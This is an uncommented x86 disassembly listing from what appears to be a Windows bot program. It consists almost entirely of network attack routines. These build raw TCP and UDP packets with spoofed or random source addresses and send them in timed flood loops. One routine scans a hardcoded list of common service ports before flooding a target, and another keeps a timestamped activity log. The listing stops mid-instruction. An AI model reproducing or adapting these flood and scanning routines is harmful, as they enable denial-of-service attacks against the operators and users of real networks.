var_3E = word ptr -3Eh var_3C = dword ptr -3Ch var_38 = dword ptr -38h var_34 = dword ptr -34h var_30 = word ptr -30h var_2E = word ptr -2Eh var_2C = word ptr -2Ch var_28 = byte ptr -28h var_14 = dword ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_194 = dword ptr 19Ch arg_198 = dword ptr 1A0h push ebp mov ebp, esp sub esp, 0CCh push ebx push esi mov esi, dword_4270A8 xor ebx, ebx push edi mov [ebp+var_4], ebx call esi ; GetTickCount push 0FFh push 3 push 2 mov [ebp+var_10], eax call ds:dword_4CB6D4 ; socket mov [ebp+var_8], eax call esi ; GetTickCount push eax call sub_41B8D8 pop ecx mov edi, 578h push edi push 9 push 1 call sub_418685 pop ecx pop ecx push eax lea eax, [ebp+var_28] push eax call sub_41B590 add esp, 0Ch mov esi, 5A0h loc_4144DE: ; CODE XREF: sub_414484+235j call dword_4270A8 ; GetTickCount sub eax, [ebp+var_10] xor edx, edx mov ecx, 3E8h div ecx cmp eax, [ebp+arg_198] ja loc_4146BE cmp ds:dword_4CEE08, ebx jnz short loc_41455D push 10h pop eax mov [ebp+var_14], eax push eax lea eax, [ebp+var_68] push ebx push eax call sub_41B590 add esp, 0Ch lea eax, [ebp+var_14] push eax lea eax, [ebp+var_68] push eax push [ebp+arg_0] call ds:dword_4CB5F8 ; getsockname push 0FFh push 1 call sub_418685 pop ecx pop ecx push eax movzx eax, [ebp+var_62] push eax movzx eax, [ebp+var_63] push eax movzx eax, [ebp+var_64] push eax lea eax, [ebp+var_CC] push offset aD_D_D_D ; "%d.%d.%d.%d" push eax call sub_41B886 add esp, 18h jmp short loc_414570 ; --------------------------------------------------------------------------- loc_41455D: ; CODE XREF: sub_414484+7Ej lea eax, [ebp+var_CC] push offset dword_4CE7E8 push eax call sub_41BEB0 pop ecx pop ecx loc_414570: ; CODE XREF: sub_414484+D7j lea eax, [ebp+var_CC] push eax call ds:dword_4CB694 ; inet_addr mov [ebp+var_C], eax mov eax, [ebp+var_58] and al, 45h push esi or al, 45h mov [ebp+var_54], 10h mov [ebp+var_58], eax call ds:dword_4CB654 ; htons mov [ebp+var_52], ax call sub_41B8E2 mov [ebp+var_50], ax mov eax, [ebp+var_C] mov [ebp+var_48], eax mov eax, [ebp+arg_194] mov [ebp+var_4E], 40h mov [ebp+var_4C], 40h mov [ebp+var_4B], 6 mov [ebp+var_4A], bx mov [ebp+var_44], eax call sub_41B8E2 mov [ebp+var_40], ax call sub_41B8E2 mov [ebp+var_3E], ax call sub_41B8E2 mov [ebp+var_3C], eax call sub_41B8E2 mov [ebp+var_38], eax mov eax, [ebp+var_34] and ax, 0FF50h push 14h or al, 50h mov byte ptr [ebp+var_34+2], 18h mov word ptr [ebp+var_34], ax mov ax, [ebp+var_3E] mov [ebp+var_76], ax mov eax, [ebp+var_44] mov [ebp+var_74], eax lea eax, [ebp+var_58] push eax mov [ebp+var_30], 787Dh mov [ebp+var_2E], bx mov [ebp+var_2C], bx mov [ebp+var_78], 2 call sub_41437A mov [ebp+var_4A], ax lea eax, [ebp+var_58] push 28h push eax call sub_41437A mov eax, [ebp+var_48] add esp, 10h mov [ebp+var_AC], eax mov eax, [ebp+var_44] push 58Ch mov [ebp+var_A8], eax mov [ebp+var_A4], bl mov [ebp+var_A3], 6 call dword_427210 ; htons mov [ebp+var_A2], ax lea eax, [ebp+var_A0] push 14h push eax lea eax, [ebp+var_40] push eax call sub_41C310 lea eax, [ebp+var_8C] push edi push eax lea eax, [ebp+var_28] push eax call sub_41C310 lea eax, [ebp+var_AC] push 598h push eax call sub_41437A add esp, 20h mov [ebp+var_2E], ax push 10h lea eax, [ebp+var_78] push eax push ebx lea eax, [ebp+var_58] push esi push eax push [ebp+var_8] call ds:dword_4CB6B8 ; sendto inc [ebp+var_4] jmp loc_4144DE ; --------------------------------------------------------------------------- loc_4146BE: ; CODE XREF: sub_414484+72j push [ebp+var_8] call ds:dword_4CB6EC ; closesocket mov eax, [ebp+var_4] pop edi pop esi pop ebx leave retn sub_414484 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4146CF proc near ; DATA XREF: sub_401ACD+4CC0o var_414 = byte ptr -414h var_214 = byte ptr -214h var_10 = dword ptr -10h arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 414h mov edx, [ebp+arg_0] push esi mov eax, 85h push edi mov ecx, eax mov esi, edx lea edi, [ebp+var_214] sub esp, 214h rep movsd mov ecx, eax lea esi, [ebp+var_214] mov edi, esp mov dword ptr [edx+210h], 1 rep movsd call sub_414746 add esp, 214h push eax lea eax, [ebp+var_414] push offset unk_4365DC push eax call sub_41B886 lea eax, [ebp+var_414] push eax call sub_4151AD push [ebp+var_10] call sub_40B413 add esp, 14h push 0 call dword_4270CC ; ExitThread sub_4146CF endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_414746 proc near ; CODE XREF: sub_4146CF+3Bp var_254 = byte ptr -254h var_54 = byte ptr -54h var_34 = byte ptr -34h var_30 = byte ptr -30h var_2F = byte ptr -2Fh var_2E = byte ptr -2Eh var_24 = word ptr -24h var_22 = word ptr -22h var_20 = dword ptr -20h var_14 = dword ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = byte ptr 0Ch arg_84 = byte ptr 8Ch arg_104 = byte ptr 10Ch arg_184 = byte ptr 18Ch arg_208 = dword ptr 210h arg_20C = dword ptr 214h push ebp mov ebp, esp sub esp, 254h push ebx push esi mov ebx, 0FFh push edi push ebx push 3 push 2 call ds:dword_4CB6D4 ; socket cmp eax, 0FFFFFFFFh mov [ebp+var_C], eax jnz short loc_414784 lea eax, [ebp+var_254] push offset unk_4367CC push eax call sub_41B886 pop ecx xor edi, edi pop ecx jmp loc_414A4D ; --------------------------------------------------------------------------- loc_414784: ; CODE XREF: sub_414746+22j lea ecx, [ebp+var_14] push 4 push ecx xor edi, edi push 2 push edi push eax mov [ebp+var_14], 1 call ds:dword_4CB634 ; setsockopt cmp eax, 0FFFFFFFFh jnz short loc_4147B0 call ds:dword_4CB5E8 ; WSAGetLastError push eax push offset unk_43677C jmp short loc_4147CB ; --------------------------------------------------------------------------- loc_4147B0: ; CODE XREF: sub_414746+5Aj lea eax, [ebp+arg_4] push eax call ds:dword_4CB694 ; inet_addr cmp eax, 0FFFFFFFFh jnz short loc_4147DF call ds:dword_4CB5E8 ; WSAGetLastError push eax push offset unk_436738 loc_4147CB: ; CODE XREF: sub_414746+68j lea eax, [ebp+var_254] push eax call sub_41B886 add esp, 0Ch jmp loc_414A4D ; --------------------------------------------------------------------------- loc_4147DF: ; CODE XREF: sub_414746+77j push edi mov [ebp+var_24], 2 call ds:dword_4CB654 ; htons mov [ebp+var_22], ax lea eax, [ebp+arg_4] push eax call dword_42720C ; inet_addr mov esi, dword_4270A8 mov [ebp+var_20], eax call esi ; GetTickCount mov [ebp+var_8], eax lea eax, [ebp+arg_4] push eax lea eax, [ebp+var_254] push offset unk_43670C push eax call sub_41B886 add esp, 0Ch cmp [ebp+arg_20C], edi jnz short loc_414848 push edi lea eax, [ebp+var_254] push [ebp+arg_208] push eax lea eax, [ebp+arg_184] push eax push [ebp+arg_0] call sub_409A73 add esp, 14h loc_414848: ; CODE XREF: sub_414746+E0j mov [ebp+var_4], edi call esi ; GetTickCount sub eax, [ebp+var_8] xor edx, edx mov ecx, 3E8h div ecx mov esi, eax lea eax, [ebp+arg_104] push eax call sub_41B779 cmp esi, eax pop ecx ja loc_414A03 mov esi, 41Ch jmp short loc_41487C ; --------------------------------------------------------------------------- loc_414877: ; CODE XREF: sub_414746+2B7j mov ebx, 0FFh loc_41487C: ; CODE XREF: sub_414746+12Fj cmp ds:dword_4CEE08, edi jnz short loc_4148D6 push 10h pop eax mov [ebp+var_10], eax push eax lea eax, [ebp+var_34] push edi push eax call sub_41B590 add esp, 0Ch lea eax, [ebp+var_10] push eax lea eax, [ebp+var_34] push eax push [ebp+arg_0] call ds:dword_4CB5F8 ; getsockname push ebx push 1 call sub_418685 pop ecx pop ecx push eax movzx eax, [ebp+var_2E] push eax movzx eax, [ebp+var_2F] push eax movzx eax, [ebp+var_30] push eax lea eax, [ebp+var_54] push offset aD_D_D_D ; "%d.%d.%d.%d" push eax call sub_41B886 add esp, 18h jmp short loc_4148E6 ; --------------------------------------------------------------------------- loc_4148D6: ; CODE XREF: sub_414746+13Cj lea eax, [ebp+var_54] push offset dword_4CE7E8 push eax call sub_41BEB0 pop ecx pop ecx loc_4148E6: ; CODE XREF: sub_414746+18Ej push esi mov ds:byte_4CE9E8, 45h call ds:dword_4CB654 ; htons mov ds:word_4CE9EA, ax lea eax, [ebp+var_54] push eax mov ds:word_4CE9EC, 1 mov ds:word_4CE9EE, di mov ds:byte_4CE9F0, 80h mov ds:byte_4CE9F1, 11h mov ds:word_4CE9F2, di call ds:dword_4CB694 ; inet_addr mov ds:dword_4CE9F4, eax mov eax, [ebp+var_20] mov ds:dword_4CE9F8, eax lea eax, [ebp+arg_84] push eax mov ds:word_4CEA02, di call sub_41B779 test eax, eax pop ecx jnz short loc_41495E call sub_41B8E2 cdq mov ecx, 401h idiv ecx push edx jmp short loc_41496C ; --------------------------------------------------------------------------- loc_41495E: ; CODE XREF: sub_414746+206j lea eax, [ebp+arg_84] push eax call sub_41B779 pop ecx push eax loc_41496C: ; CODE XREF: sub_414746+216j call ds:dword_4CB654 ; htons mov ds:word_4CE9FE, ax call sub_41B8E2 cdq mov ecx, 401h push 408h idiv ecx mov ds:word_4CE9FC, dx call ds:dword_4CB654 ; htons push 400h mov ds:word_4CEA00, ax call sub_41B8E2 cdq idiv ebx push edx push offset dword_4CEA04 call sub_41B590 add esp, 0Ch lea eax, [ebp+var_24] push 10h push eax push edi push esi push offset byte_4CE9E8 push [ebp+var_C] call ds:dword_4CB6B8 ; sendto cmp eax, 0FFFFFFFFh jz loc_414A7C inc [ebp+var_4] call dword_4270A8 ; GetTickCount sub eax, [ebp+var_8] xor edx, edx mov ecx, 3E8h div ecx mov ebx, eax lea eax, [ebp+arg_104] push eax call sub_41B779 cmp ebx, eax pop ecx jbe loc_414877 loc_414A03: ; CODE XREF: sub_414746+124j push [ebp+var_C] call ds:dword_4CB6EC ; closesocket mov esi, [ebp+var_4] lea eax, [ebp+arg_104] push eax imul esi, 41Ch call sub_41B779 pop ecx xor edx, edx mov ecx, eax mov eax, esi shr eax, 0Ah div ecx shr esi, 14h push eax push esi push [ebp+var_4] lea eax, [ebp+arg_4] push eax push offset unk_4366A8 loc_414A3E: ; CODE XREF: sub_414746+34Aj lea eax, [ebp+var_254] push eax call sub_41B886 add esp, 18h loc_414A4D: ; CODE XREF: sub_414746+39j ; sub_414746+94j cmp [ebp+arg_20C], edi jnz short loc_414A75 push edi lea eax, [ebp+var_254] push [ebp+arg_208] push eax lea eax, [ebp+arg_184] push eax push [ebp+arg_0] call sub_409A73 add esp, 14h loc_414A75: ; CODE XREF: sub_414746+30Dj pop edi pop esi xor eax, eax pop ebx leave retn ; --------------------------------------------------------------------------- loc_414A7C: ; CODE XREF: sub_414746+28Bj push [ebp+var_4] push esi call ds:dword_4CB5E8 ; WSAGetLastError push eax lea eax, [ebp+arg_4] push eax push offset unk_43661C jmp short loc_414A3E sub_414746 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_414A92 proc near ; DATA XREF: sub_401ACD+6362o var_414 = byte ptr -414h var_214 = dword ptr -214h var_210 = byte ptr -210h var_190 = byte ptr -190h var_110 = byte ptr -110h var_90 = byte ptr -90h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 414h mov eax, [ebp+arg_0] push esi push edi mov ecx, 85h mov esi, eax lea edi, [ebp+var_214] rep movsd mov dword ptr [eax+210h], 1 lea eax, [ebp+var_110] push eax call sub_41B779 pop ecx push eax lea eax, [ebp+var_190] push eax call sub_41B779 pop ecx push eax lea eax, [ebp+var_210] push eax call ds:dword_4CB694 ; inet_addr push eax call sub_414C2F add esp, 0Ch push eax lea eax, [ebp+var_414] push offset unk_4367F8 push eax call sub_41B886 xor esi, esi add esp, 0Ch cmp [ebp+var_8], esi jnz short loc_414B27 push esi lea eax, [ebp+var_414] push [ebp+var_C] push eax lea eax, [ebp+var_90] push eax push [ebp+var_214] call sub_409A73 add esp, 14h loc_414B27: ; CODE XREF: sub_414A92+73j lea eax, [ebp+var_414] push eax call sub_4151AD push [ebp+var_10] call sub_40B413 pop ecx pop ecx push esi call dword_4270CC ; ExitThread pop edi pop esi sub_414A92 endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_414B46 proc near ; CODE XREF: sub_414C2F+194p var_210 = dword ptr -210h var_20C = dword ptr -20Ch var_10C = dword ptr -10Ch var_108 = dword ptr -108h var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h push ebp mov ebp, esp sub esp, 210h and [ebp+var_4], 0 cmp [ebp+arg_C], 0 push esi push edi jnz short loc_414B6F push [ebp+arg_8] push [ebp+arg_4] push [ebp+arg_0] call dword_427214 ; connect jmp loc_414C2B ; --------------------------------------------------------------------------- loc_414B6F: ; CODE XREF: sub_414B46+13j mov esi, [ebp+arg_0] push 1 pop edi lea eax, [ebp+var_8] push eax push 8004667Eh push esi mov [ebp+var_8], edi call dword_4271F8 ; ioctlsocket push [ebp+arg_8] push [ebp+arg_4] push esi call ds:dword_4CB5FC ; connect push [ebp+arg_C] lea eax, [ebp+var_210] mov [ebp+var_108], esi mov [ebp+var_10C], edi push 0 push eax lea eax, [ebp+var_10C] mov [ebp+var_20C], esi push eax lea eax, [esi+1] push eax mov [ebp+var_210], edi call ds:dword_4CB63C ; select test eax, eax jnz short loc_414BD3 or eax, 0FFFFFFFFh jmp short loc_414C2B ; --------------------------------------------------------------------------- loc_414BD3: ; CODE XREF: sub_414B46+86j or edi, 0FFFFFFFFh cmp eax, edi jnz short loc_414BDE loc_414BDA: ; CODE XREF: sub_414B46+B8j ; sub_414B46+DCj mov eax, edi jmp short loc_414C2B ; --------------------------------------------------------------------------- loc_414BDE: ; CODE XREF: sub_414B46+92j lea eax, [ebp+var_10C] push eax push esi call sub_426756 ; __WSAFDIsSet test eax, eax jnz short loc_414C00 lea eax, [ebp+var_210] push eax push esi call sub_426756 ; __WSAFDIsSet test eax, eax jz short loc_414BDA loc_414C00: ; CODE XREF: sub_414B46+A7j lea eax, [ebp+arg_0] mov [ebp+arg_0], 4 push eax lea eax, [ebp+var_4] push eax push 1007h push 0FFFFh push esi call dword_4271E0 ; getsockopt cmp eax, edi jz short loc_414BDA mov eax, [ebp+var_4] neg eax sbb eax, eax loc_414C2B: ; CODE XREF: sub_414B46+24j ; sub_414B46+8Bj ... pop edi pop esi leave retn sub_414B46 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_414C2F proc near ; CODE XREF: sub_414A92+51p var_10C = dword ptr -10Ch var_108 = dword ptr -108h var_104 = dword ptr -104h var_100 = byte ptr -100h var_9C = word ptr -9Ch var_9A = word ptr -9Ah var_98 = dword ptr -98h var_8C = dword ptr -8Ch var_88 = dword ptr -88h var_84 = dword ptr -84h var_80 = dword ptr -80h var_7C = dword ptr -7Ch var_78 = dword ptr -78h var_74 = dword ptr -74h var_70 = dword ptr -70h var_6C = dword ptr -6Ch var_68 = dword ptr -68h var_64 = dword ptr -64h var_60 = dword ptr -60h var_5C = dword ptr -5Ch var_58 = dword ptr -58h var_54 = dword ptr -54h var_50 = dword ptr -50h var_4C = dword ptr -4Ch var_48 = dword ptr -48h var_44 = dword ptr -44h var_40 = dword ptr -40h var_3C = dword ptr -3Ch var_38 = dword ptr -38h var_34 = dword ptr -34h var_30 = dword ptr -30h var_2C = dword ptr -2Ch var_28 = dword ptr -28h var_24 = dword ptr -24h var_20 = dword ptr -20h var_1C = dword ptr -1Ch var_18 = dword ptr -18h var_14 = dword ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp sub esp, 10Ch push ebx push esi push edi push 1 pop eax xor ebx, ebx push eax push ebx push ebx push 0FFh push 3 push 2 mov [ebp+var_14], eax call dword_427208 ; WSASocketA lea ecx, [ebp+var_14] push 4 push ecx push 2 push ebx push eax mov ds:dword_4CEE78, eax call ds:dword_4CB634 ; setsockopt mov esi, dword_4270A8 call esi ; GetTickCount push eax call sub_41B8D8 pop ecx xor eax, eax push 19h lea edi, [ebp+var_100] pop ecx mov [ebp+var_10C], ebx mov [ebp+var_7C], ecx mov [ebp+var_108], ebx mov [ebp+var_104], ebx mov [ebp+var_8C], 401h mov [ebp+var_88], 15h mov [ebp+var_84], 16h mov [ebp+var_80], 17h mov [ebp+var_78], 35h mov [ebp+var_74], 50h mov [ebp+var_70], 51h mov [ebp+var_6C], 58h mov [ebp+var_68], 6Eh mov [ebp+var_64], 71h mov [ebp+var_60], 77h mov [ebp+var_5C], 87h mov [ebp+var_58], 89h mov [ebp+var_54], 8Bh mov [ebp+var_50], 8Fh mov [ebp+var_4C], 1BBh mov [ebp+var_48], 1BDh mov [ebp+var_44], 400h mov [ebp+var_40], 599h mov [ebp+var_3C], 5DCh mov [ebp+var_38], 6B8h mov [ebp+var_34], 0CEAh mov [ebp+var_30], 0D3Dh mov [ebp+var_2C], 1388h mov [ebp+var_28], 1A0Bh mov [ebp+var_24], 1F40h mov [ebp+var_20], 1F90h rep stosd mov [ebp+var_10], ebx mov [ebp+var_1C], 3 mov [ebp+var_18], 0BB8h mov [ebp+var_4], ebx loc_414D75: ; CODE XREF: sub_414C2F+1C1j mov eax, [ebp+arg_0] mov [ebp+var_9C], 2 mov [ebp+var_98], eax mov eax, [ebp+var_4] lea edi, [ebp+eax+var_8C] mov ax, word ptr [ebp+eax+var_8C] push eax call ds:dword_4CB654 ; htons push ebx push 1 push 2 mov [ebp+var_9A], ax call ds:dword_4CB6D4 ; socket lea ecx, [ebp+var_1C] mov [ebp+var_C], eax push ecx lea ecx, [ebp+var_9C] push 10h push ecx push eax call sub_414B46 add esp, 10h mov [ebp+var_8], eax push [ebp+var_C] call ds:dword_4CB6EC ; closesocket cmp [ebp+var_8], ebx jnz short loc_414DE8 mov ecx, [ebp+var_4] mov eax, [edi] mov [ebp+ecx+var_10C], eax loc_414DE8: ; CODE XREF: sub_414C2F+1ABj add [ebp+var_4], 4 cmp [ebp+var_4], 70h jl short loc_414D75 mov edi, offset dword_4CEE7C push offset asc_42D128 ; " " push edi call sub_41B886 pop ecx pop ecx call esi ; GetTickCount mov [ebp+var_C], eax lea eax, [ebp+var_10C] mov [ebp+var_4], ebx mov [ebp+var_8], eax loc_414E15: ; CODE XREF: sub_414C2F+23Cj call esi ; GetTickCount sub eax, [ebp+var_C] xor edx, edx mov ecx, 3E8h div ecx cmp eax, [ebp+arg_4] ja short loc_414E6D mov eax, [ebp+var_8] mov eax, [eax] cmp eax, ebx jz short loc_414E46 push eax push edi push offset aSD ; "%s%d " push edi mov [ebp+var_10], eax call sub_41B886 add esp, 10h jmp short loc_414E60 ; --------------------------------------------------------------------------- loc_414E46: ; CODE XREF: sub_414C2F+200j push 0FFFFh push ebx call sub_418685 pop ecx pop ecx push eax call ds:dword_4CB654 ; htons movzx eax, ax mov [ebp+var_10], eax loc_414E60: ; CODE XREF: sub_414C2F+215j inc [ebp+var_4] add [ebp+var_8], 4 cmp [ebp+var_4], 1Ch jl short loc_414E15 loc_414E6D: ; CODE XREF: sub_414C2F+1F7j ; sub_414C2F+477j push 28h push ebx push offset byte_4CEE18 call sub_41B590 mov esi, 0FFFFh mov ds:byte_4CEE18, 45h push esi push 400h mov ds:byte_4CEE21, 6 mov ds:byte_4CEE19, 8 call sub_418685 add esp, 14h push eax call ds:dword_4CB654 ; htons push 28h mov ds:word_4CEE1C, ax call ds:dword_4CB654 ; htons or ds:byte_4CEE20, 0FFh cmp ds:dword_4CEE08, ebx mov ds:word_4CEE1A, ax mov ds:word_4CEE1E, bx jnz short loc_414EED push 0FFFEh push 1 call sub_418685 pop ecx pop ecx mov ecx, [ebp+arg_0] shl eax, 10h and ecx, esi or eax, ecx jmp short loc_414EF8 ; --------------------------------------------------------------------------- loc_414EED: ; CODE XREF: sub_414C2F+2A2j push offset dword_4CE7E8 call ds:dword_4CB694 ; inet_addr loc_414EF8: ; CODE XREF: sub_414C2F+2BCj mov ds:dword_4CEE24, eax mov eax, [ebp+arg_0] push 4000h mov ds:dword_4CEE28, eax mov ds:byte_4CEE39, bl call ds:dword_4CB654 ; htons push esi push ebx mov ds:word_4CEE3A, ax call sub_418685 mov edi, eax push esi push ebx shl edi, 8 call sub_418685 add esp, 10h add edi, eax push edi call ds:dword_4CB650 ; htonl mov ds:dword_4CEE30, eax mov al, ds:byte_4CEE38 mov edi, [ebp+arg_0] and al, 0Fh or al, 50h push 14h mov ds:byte_4CEE38, al mov ax, word ptr [ebp+var_10] mov ds:dword_4CEE34, ebx mov ds:word_4CEE3E, bx mov ds:word_4CEE2E, ax mov ds:dword_4CEE54, edi mov ds:byte_4CEE58, bl mov ds:byte_4CEE59, 6 call ds:dword_4CB654 ; htons mov ds:word_4CEE5A, ax mov ax, ds:word_4CEE2E mov ds:word_4CEE40, 2 mov ds:dword_4CEE44, edi mov ds:word_4CEE42, ax mov [ebp+var_4], ebx jmp short loc_414FAE ; --------------------------------------------------------------------------- loc_414FA9: ; CODE XREF: sub_414C2F+451j mov esi, 0FFFFh loc_414FAE: ; CODE XREF: sub_414C2F+378j cmp [ebp+var_4], ebx jnz short loc_414FE2 push esi push ebx call sub_418685 pop ecx pop ecx push eax call ds:dword_4CB654 ; htons mov ds:word_4CEE2C, ax mov eax, ds:dword_4CEE24 mov ds:dword_4CEE50, eax mov ds:byte_4CEE39, 2 mov ds:dword_4CEE34, ebx jmp short loc_415001 ; --------------------------------------------------------------------------- loc_414FE2: ; CODE XREF: sub_414C2F+382j push esi push ebx mov ds:byte_4CEE39, 10h call sub_418685 pop ecx pop ecx push eax call ds:dword_4CB654 ; htons movzx eax, ax mov ds:dword_4CEE34, eax loc_415001: ; CODE XREF: sub_414C2F+3B1j inc ds:word_4CEE1C inc ds:dword_4CEE30 mov ax, ds:word_4CEE2E push 5 pop ecx mov esi, offset word_4CEE2C mov edi, offset dword_4CEE5C mov ds:word_4CEE22, bx mov ds:word_4CEE3C, bx push 14h rep movsd mov esi, offset byte_4CEE18 mov ds:word_4CEE42, ax push esi call sub_40AC69 push 20h push offset dword_4CEE50 mov ds:word_4CEE22, ax call sub_40AC69 add esp, 10h mov ds:word_4CEE3C, ax push 10h push offset word_4CEE40 push ebx push 28h push esi push ds:dword_4CEE78 call ds:dword_4CB6B8 ; sendto inc [ebp+var_4] cmp [ebp+var_4], 3FFh jl loc_414FA9 call dword_4270A8 ; GetTickCount sub eax, [ebp+var_C] xor edx, edx mov ecx, 3E8h div ecx cmp eax, [ebp+arg_4] ja short loc_4150AB push [ebp+arg_8] call dword_427078 ; Sleep jmp loc_414E6D ; --------------------------------------------------------------------------- loc_4150AB: ; CODE XREF: sub_414C2F+46Cj pop edi pop esi mov eax, offset dword_4CEE7C pop ebx leave retn sub_414C2F endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4150B5 proc near ; CODE XREF: sub_401ACD+7200p var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp push ecx and [ebp+var_4], 0 push esi push edi mov esi, offset dword_43D810 mov edi, 0B8h loc_4150C9: ; CODE XREF: sub_4150B5+33j cmp byte ptr [esi], 0 jz short loc_4150EC push [ebp+arg_0] push esi call sub_41C070 pop ecx test eax, eax pop ecx jz short loc_4150EC inc [ebp+var_4] add esi, edi cmp esi, offset dword_43E390 jl short loc_4150C9 jmp short loc_41512E ; --------------------------------------------------------------------------- loc_4150EC: ; CODE XREF: sub_4150B5+17j ; sub_4150B5+26j mov esi, [ebp+var_4] push ebx imul esi, 0B8h push edi push 0 lea ebx, dword_43D810[esi] push ebx call sub_41B590 push 17h push [ebp+arg_0] push ebx call sub_41B5F0 push 9Fh lea eax, dword_43D828[esi] push [ebp+arg_4] push eax call sub_41B5F0 add esp, 24h inc dword_4294D4 pop ebx loc_41512E: ; CODE XREF: sub_4150B5+35j mov eax, [ebp+var_4] pop edi pop esi leave retn sub_4150B5 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_415135 proc near ; CODE XREF: sub_401ACD+28DEp var_200 = byte ptr -200h arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp sub esp, 200h push esi push edi push 0 push [ebp+arg_8] push offset dword_436840 push [ebp+arg_4] push [ebp+arg_0] call sub_409A73 add esp, 14h xor edi, edi mov esi, offset dword_43D810 loc_41515F: ; CODE XREF: sub_415135+72j cmp byte ptr [esi], 0 jz short loc_41519A lea eax, [esi+18h] push eax push esi push edi push offset dword_43682C lea eax, [ebp+var_200] push 200h push eax call sub_41B980 push 1 lea eax, [ebp+var_200] push [ebp+arg_8] push eax push [ebp+arg_4] push [ebp+arg_0] call sub_409A73 add esp, 2Ch loc_41519A: ; CODE XREF: sub_415135+2Dj add esi, 0B8h inc edi cmp esi, offset dword_43E390 jl short loc_41515F pop edi pop esi leave retn sub_415135 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4151AD proc near ; CODE XREF: sub_401221+384p ; sub_401221+408p ... var_10 = word ptr -10h var_E = word ptr -0Eh var_A = word ptr -0Ah var_8 = word ptr -8 var_6 = word ptr -6 var_4 = word ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 10h push ebx push esi lea eax, [ebp+var_10] push edi push eax call dword_42712C ; GetLocalTime mov ebx, offset dword_4D327C mov edi, 80h mov esi, offset dword_4CF27C loc_4151CF: ; CODE XREF: sub_4151AD+3Dj cmp byte ptr [ebx], 0 jz short loc_4151E6 push 7Fh lea eax, [ebx+80h] push ebx push eax call sub_41B5F0 add esp, 0Ch loc_4151E6: ; CODE XREF: sub_4151AD+25j sub ebx, edi cmp ebx, esi jge short loc_4151CF movzx eax, [ebp+var_4] push [ebp+arg_0] push eax movzx eax, [ebp+var_6] push eax movzx eax, [ebp+var_8] push eax movzx eax, [ebp+var_10] push eax movzx eax, [ebp+var_A] push eax movzx eax, [ebp+var_E] push eax push offset a_2d_2d4d_2d_2d ; "[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s" push edi push esi call sub_41B980 add esp, 28h pop edi pop esi pop ebx leave retn sub_4151AD endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_415221 proc near ; CODE XREF: sub_4017ED+F7p ; sub_401ACD:loc_402077p ... var_80 = byte ptr -80h arg_0 = dword ptr 8 arg_4 = byte ptr 0Ch push ebp mov ebp, esp sub esp, 80h lea eax, [ebp+arg_4] push eax lea eax, [ebp+var_80] push [ebp+arg_0] push 80h push eax call sub_41C190 lea eax, [ebp+var_80] push eax call sub_4151AD add esp, 14h leave retn sub_415221 endp ; =============== S U B R O U T I N E ======================================= sub_41524D proc near ; CODE XREF: sub_401ACD+27D5p arg_0 = dword ptr 4 arg_4 = dword ptr 8 arg_8 = dword ptr 0Ch arg_C = dword ptr 10h mov eax, offset dword_4CF27C xor ecx, ecx loc_415254: ; CODE XREF: sub_41524D+13j mov [eax], cl add eax, 80h cmp eax, offset dword_4D327C jl short loc_415254 cmp [esp+arg_C], ecx jnz short loc_415282 push ecx push [esp+4+arg_8] push offset dword_43688C push [esp+0Ch+arg_4] push [esp+10h+arg_0] call sub_409A73 add esp, 14h loc_415282: ; CODE XREF: sub_41524D+19j push offset dword_436878 call sub_4151AD pop ecx retn sub_41524D endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41528E proc near ; DATA XREF: sub_401ACD+2888o var_31C = byte ptr -31Ch var_11C = dword ptr -11Ch var_118 = byte ptr -118h var_98 = byte ptr -98h var_18 = dword ptr -18h var_14 = dword ptr -14h var_10 = dword ptr -10h var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 31Ch mov eax, [ebp+arg_0] push esi push edi push 45h pop ecx mov esi, eax lea edi, [ebp+var_11C] push 1 rep movsd xor edx, edx pop edi cmp [ebp+var_10], edx mov [ebp+var_8], 80h mov [ebp+var_4], edx mov [eax+110h], edi jnz short loc_4152E1 push edx lea eax, [ebp+var_118] push [ebp+var_14] push offset dword_4368BC push eax push [ebp+var_11C] call sub_409A73 add esp, 14h loc_4152E1: ; CODE XREF: sub_41528E+33j cmp [ebp+var_98], 0 jz short loc_415301 lea eax, [ebp+var_98] push eax call sub_41B779 test eax, eax pop ecx mov [ebp+var_4], eax jz short loc_415301 mov [ebp+var_8], eax loc_415301: ; CODE XREF: sub_41528E+5Aj ; sub_41528E+6Ej and [ebp+arg_0], 0 mov esi, offset dword_4CF27C loc_41530A: ; CODE XREF: sub_41528E+D4j mov eax, [ebp+arg_0] cmp eax, [ebp+var_8] jge short loc_415364 cmp byte ptr [esi], 0 jz short loc_415353 cmp [ebp+var_98], 0 jz short loc_415339 cmp [ebp+var_4], 0 jnz short loc_415339 lea eax, [ebp+var_98] push eax push esi call 